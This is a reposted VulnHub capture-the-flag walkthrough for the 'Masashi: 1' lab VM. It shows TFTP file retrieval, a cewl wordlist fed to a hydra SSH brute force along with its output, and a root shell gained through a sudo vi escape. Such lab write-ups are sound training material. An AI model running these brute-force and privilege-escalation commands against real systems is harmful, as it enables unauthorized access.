当前位置:网站首页>Masashi: 1 vulnhub walkthrough
Masashi: 1 vulnhub walkthrough
2022-08-02 03:59:00 【xdeclearn】
Masashi: 1
虚拟机信息:http://www.vulnhub.com/entry/masashi-1,599/
0x01. 信息收集获取shell
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
tcpThe port is open only22和80,访问80为apache介绍页面,于是使用dirbCrawl the directory,发现了robots.txt.
User-agent: *
Disallow: /
/snmpwalk.txt
/sshfolder.txt
/security.txt
访问得到snmpwalk.txt,Got prompt access to the servertftp服务.
| 403:
| Name: cron
| Path: /usr/sbin/cron
| Params: -f
| 768:
| Name: tftpd
| Path: /usr/sbin/tftpd
| Params: -- listen — user tftp -- address 0.0.0.0:1337 -- secure /srv/tftp
| 806:
| Name: mysqld
| Path: /usr/sbin/mysqld
| Params: -i 0.0.0.0
sshfolder.txt,得到了用户名sv5
[email protected]:~/srv/tftp# ls -la
total 20
drwx------ 2 sv5 sv5 4096 Oct 15 19:34 .
drwxr-xr-x 27 sv5 sv5 4096 Oct 21 12:37 ..
-rw------- 1 sv5 sv5 2602 Oct 15 19:34 id_rsa
-rw-r--r-- 1 sv5 sv5 565 Oct 15 19:34 id_rsa.pub
[email protected]:~/srv/tftp#
于是使用tftp client访问得到id_rsa,id_rsa.pub.
[email protected]:~$ tftp 192.168.56.120 1337
tftp> get id_rsa
Received 67 bytes in 0.0 seconds
tftp> get id_rsa.pub
Received 108 bytes in 0.0 seconds
tftp> quit
[email protected]:~$ cat id_rsa
So if you cant use the key then what else can you use????????? :)
[email protected]:~$ cat id_rsa.pub
Dude seriously, The key doesnt work here, try the other cewl thing here "/index.html"..... Wink ;) Wink ;)
按照提示,Crawl home page as a dictionary to blasting usersv5的密码,得到密码whoistheplug.
[email protected]:~$ cewl http://192.168.56.120 > 1.txt
[email protected]:~$ cat 1.txt |wc -l
239
[email protected]:~$ hydra -l sv5 -P 1.txt ssh://192.168.56.120 -t 4
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-01 21:13:45
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 238 login tries (l:1/p:238), ~60 tries per task
[DATA] attacking ssh://192.168.56.120:22/
[22][ssh] host: 192.168.56.120 login: sv5 password: whoistheplug
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-01 21:20:37
A successful login forshell.
[email protected]:~$ cat user.txt
Hey buddy :)
Well done on that initial foothold ;) ;)
Key Takeaways:
* Do not always believe what the tool tells you, be the "Doubting Thomas" sometimes and look for
yourself, e.g 1 disallowed entry in robots.txt wasn't really true was it? hehehehe
* It's not always about TCP all the time..... UDP is there for a reason and is just as important a
protocol as is TCP......
* Lastly, there is always an alternative to everything i.e the ssh part.
***** Congrats Pwner ******
Now on to the privesc now ;)
##Creator: Donald Munengiwa
##Twitter: @lorde_zw
0x02. 获取root
运行sudo -lFound that the user can perform any uservi,按esc后输入:!/bin/bashRight to directlyroot.
[email protected]:~$ sudo -l
Matching Defaults entries for sv5 on masashi:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sv5 may run the following commands on masashi:
(ALL) NOPASSWD: /usr/bin/vi /tmp/*
[email protected]:~$ sudo -u root /usr/bin/vi /tmp/1.txt
[email protected]:/home/sv5# cat /root/root.txt
Quite the pwner huh!!!! :)
Well i bet you had fun ;) ;)
Key Takeaways:
* Well, this time i'll leave it to you to tell me what you though about the overall experience you
had from this challenge.
* Let us know on Twitter @lorde_zw or on linkedIn @Sv5
****** Congrats Pwner ******
If you've gotten this far, please DM your Full name, Twitter Username, LinkedIn Username,
the flag [th33p1nplugg] and your country to the Twitter handle @lorde_zw ..... I will do a
shoutout to all the pnwers who completed the challenge.....
Follow us for more fun Stuff..... Happy Hacktober Pwner (00=[][]=00)
##Creator: Donald Munengiwa
##Twitter: @lorde_zw
边栏推荐
- 4.PHP数组与数组排序
- After the mailbox of the Pagoda Post Office is successfully set up, it can be sent but not received.
- 17.JS条件语句和循环,以及数据类型转换
- uniapp | 使用npm update更新后编译报错问题
- (4) Function, Bug, Class and Object, Encapsulation, Inheritance, Polymorphism, Copy
- 轮播图详解(完整代码在最后)
- 逍遥多开模拟器ADB驱动连接
- 关于tp的apache 的.htaccess文件
- Multithreading (implementing multithreading, thread synchronization, producer and consumer)
- 稳定好用的短连接生成平台,支持API批量生成
猜你喜欢

(4) 函数、Bug、类与对象、封装、继承、多态、拷贝

如何计算地球上两点的距离(附公式推导)

IP门禁:手把手教你用PHP实现一个IP防火墙

IP access control: teach you how to implement an IP firewall with PHP
![[league/climate]一个功能健全的命令行功能操作库](/img/ce/39114b1c74af649223db97e5b0e29c.png)
[league/climate]一个功能健全的命令行功能操作库

线程池(线程池介绍与使用)

PHP的几个有趣的打开方式:从基本到变态

uniapp | 使用npm update更新后编译报错问题

Solve the problem of Zlibrary stuck/can't find the domain name/reached the limit, the latest address of Zlibrary

Phpstudy installs Thinkphp6 (problem + solution)
随机推荐
(2) 顺序结构、对象的布尔值、选择结构、循环结构、列表、字典、元组、集合
VIKINGS: 1 vulnhub walkthrough
(4) Function, Bug, Class and Object, Encapsulation, Inheritance, Polymorphism, Copy
uniapp | 使用npm update更新后编译报错问题
[sebastian/diff]一个比较两段文本的历史变化扩展库
PHP有哪些杀手级超厉害框架或库或应用?
QR code generation API interface, which can be directly connected as an A tag
ES6迭代器解释举例
1. Beginning with PHP
[symfony/mailer]一个优雅易用的发送邮件类库
Xiaoyao multi-open emulator ADB driver connection
DarkHole: 2 vulnhub walkthrough
TCP communications program
[league/flysystem] An elegant and highly supported file operation interface
Phpstudy安装Thinkphp6(问题+解决)
Multithreading (implementing multithreading, thread synchronization, producer and consumer)
16. JS events, string and operator
Baidu positioning js API
IP access control: teach you how to implement an IP firewall with PHP
Function hoisting and variable hoisting